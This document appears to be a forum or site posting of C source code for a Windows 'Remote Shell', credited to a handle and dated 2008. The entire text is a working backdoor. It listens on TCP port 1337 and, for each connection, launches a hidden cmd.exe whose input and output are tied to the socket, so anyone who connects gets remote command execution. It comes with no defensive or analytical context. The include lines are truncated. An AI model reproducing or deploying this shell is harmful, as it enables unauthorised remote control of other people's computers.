Remote Shell

/*
Name: Shell
Author: Rik /Void
Date: 10/03/08 11:06
Description: Remote Shell
*/

#include
#include

DWORD CALLBACK StartRemoteShell(void* client_socket);

int APIENTRY WinMain(HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
WSADATA Data;
sockaddr_in sockAddr;
WSAStartup(MAKEWORD(2,0),&Data);

int Sock = WSASocket(AF_INET, SOCK_STREAM,IPPROTO_TCP,0,0,0);

int SendSock = WSASocket(AF_INET, SOCK_STREAM,IPPROTO_TCP,0,0,0);


sockAddr.sin_family = AF_INET;
sockAddr.sin_port = htons(1337);
sockAddr.sin_addr.s_addr = INADDR_ANY;

connect(SendSock,(sockaddr*)&sockAddr,sizeof(sockAddr));
closesocket(SendSock);
sockAddr.sin_addr.s_addr = INADDR_ANY;

bind(Sock,(sockaddr*)&sockAddr,sizeof(sockAddr));

listen(Sock,10);

while(true)
{
int Client = accept(Sock,0,0);
CreateThread(0,0,StartRemoteShell,(void*)Client,0,0);
}


}

DWORD CALLBACK StartRemoteShell(void* client_socket)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
int Client = (int)client_socket;

memset(&si,0,sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
si.hStdError = si.hStdInput = si.hStdOutput = (HANDLE)Client;

CreateProcess("C:\\Windows\\System32\\cmd.exe",NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
WaitForSingleObject(pi.hProcess, INFINITE);
closesocket(Client);
return 0;
}